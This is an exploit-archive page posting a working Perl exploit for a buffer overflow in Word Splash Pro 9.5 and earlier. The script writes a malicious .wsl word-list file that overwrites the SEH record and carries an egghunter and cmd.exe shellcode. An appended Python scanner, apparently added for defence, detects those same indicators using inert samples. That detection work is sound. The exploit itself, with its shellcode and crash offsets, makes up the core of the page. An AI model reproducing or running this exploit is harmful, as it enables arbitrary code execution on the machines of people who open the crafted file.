[local exploits] - Word Splash Pro <= 9.5 Buffer Overflow
Posted on 20 December 2010
======================================
Word Splash Pro <= 9.5 Buffer Overflow
======================================

# Exploit Title: Word Splash Pro <= 9.5 Buffer Overflow -EggHunter-
# Software Link: http://www.chronasoft.com/software/wordsplashpro
# Version: <= 9.5
# Tested on: Win XP SP3 French
# Date: 20/12/2010
# Author: h1ch4m
# Email: h1ch4m@live.fr
# Home: Net-Effects.blogspot.com
# Greetz: Peter Van Eeckhoutte, Exploit-Database Team, Zhir0
# Note: tested on versions 9.5 & 8.3; you may have to change the address of the pop pop ret according to your SP & the program version
# Triggering details: File -> Word list -> Import, then click on the Word List Builder button

use strict;
use warnings;

my $file = "1.wsl";
my $size = 4112;                          # bytes from start of file to the SEH record
my $nseh = "\xeb\x06\x90\x90";            # next SEH: short jmp 6 bytes forward, over the handler address
my $seh  = pack('V', 0x01de44dc);         # SE handler: pop pop ret from CRDE2000.DLL
my $egg  = "w00tw00t";                    # tag the egghunter searches memory for

# Egghunter (placed after the SEH record); the four bytes in the middle are the "w00t" tag
my $egghunter =
    "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" .
    "\x77\x30\x30\x74" .
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# Shellcode: Windows XP SP2 (FR) cmd.exe, 32 bytes - Mountassif Moad aka Stack
# http://www.exploit-db.com/exploits/13510/
my $shellcode =
    "\x8B\xEC\x33\xFF\x57" .
    "\xC6\x45\xFC\x63\xC6\x45" .
    "\xFD\x6D\xC6\x45\xFE\x64" .
    "\xC6\x45\xF8\x01\x8D" .
    "\x45\xFC\x50\xB8\xC7\x93" .
    "\xBF\x77\xFF\xD0";

# NOP padding so that egg + shellcode + junk is exactly $size bytes long
my $junk = "\x90" x ($size - length($egg . $shellcode));

# File layout: egg, shellcode, NOP padding, nSEH, SEH, egghunter
open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                           # raw bytes, no newline translation on Windows
print $FILE $egg . $shellcode . $junk . $nseh . $seh . $egghunter;
close($FILE);
print "File created successfully\n";
sleep(1);

# 1337db.com [2010-12-20]
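A defender-side check added here (it is not part of the original exploit or of the vendor's software): it scans a .wsl word-list file for the structural indicators the exploit above relies on, namely a file longer than the 4112-byte SEH offset, binary content in what should be a plain-text word list, the "w00tw00t" egg tag, the "jmp +6" nSEH pattern followed by a handler address, and a long NOP sled. Only the 4112-byte offset comes from the page; the other thresholds, the function names and the sample inputs are assumptions constructed for this example.

```python
import re

# 4112 is the offset at which the exploit above overwrites the SEH record;
# every other threshold here is an assumption for this added example.
OVERFLOW_OFFSET = 4112
EGG_TAG = b"w00tw00t"
NSEH_SHORT_JMP = b"\xeb\x06\x90\x90"  # nSEH "jmp +6" over the handler address
MIN_NOP_SLED = 64                      # assumed: word lists never contain NOP runs
NOP_SLED_RE = re.compile(rb"\x90{%d,}" % MIN_NOP_SLED)


def scan_wsl(data: bytes) -> list:
    """Return the indicators found in a .wsl word-list blob (empty if clean)."""
    findings = []
    if len(data) > OVERFLOW_OFFSET:
        findings.append(f"oversized: {len(data)} bytes > {OVERFLOW_OFFSET}")
    text_like = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t")
    if data and text_like / len(data) < 0.9:
        findings.append("mostly non-text bytes in a plain-text word list")
    if EGG_TAG in data:
        findings.append("egghunter tag present")
    pos = data.find(NSEH_SHORT_JMP)
    if pos != -1 and pos + 8 <= len(data):
        handler = int.from_bytes(data[pos + 4:pos + 8], "little")
        findings.append(f"SEH overwrite pattern at {pos}, handler 0x{handler:08x}")
    m = NOP_SLED_RE.search(data)
    if m:
        findings.append(f"NOP sled of {m.end() - m.start()} bytes at {m.start()}")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Two or more independent indicators: treat the file as an exploit attempt."""
    return len(scan_wsl(data)) >= 2


# Constructed samples: a normal word list, and a file that mirrors the exploit's
# layout with inert 0xCC filler and a 0x41414141 handler instead of real code.
BENIGN_WSL = b"\r\n".join(w.encode() for w in ("apple", "banana", "cherry")) + b"\r\n"


def constructed_malicious_sample() -> bytes:
    payload = EGG_TAG + b"\xcc" * 32
    payload += b"\x90" * (OVERFLOW_OFFSET - len(payload))
    payload += NSEH_SHORT_JMP + b"\x41\x41\x41\x41" + b"\xcc" * 32
    return payload


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WSL), ("constructed", constructed_malicious_sample())):
        print(name, is_suspicious(blob), scan_wsl(blob))
```

The same checks can be applied to any file the Word List Builder is about to import, so the import is refused before the vulnerable parser ever sees the oversized list.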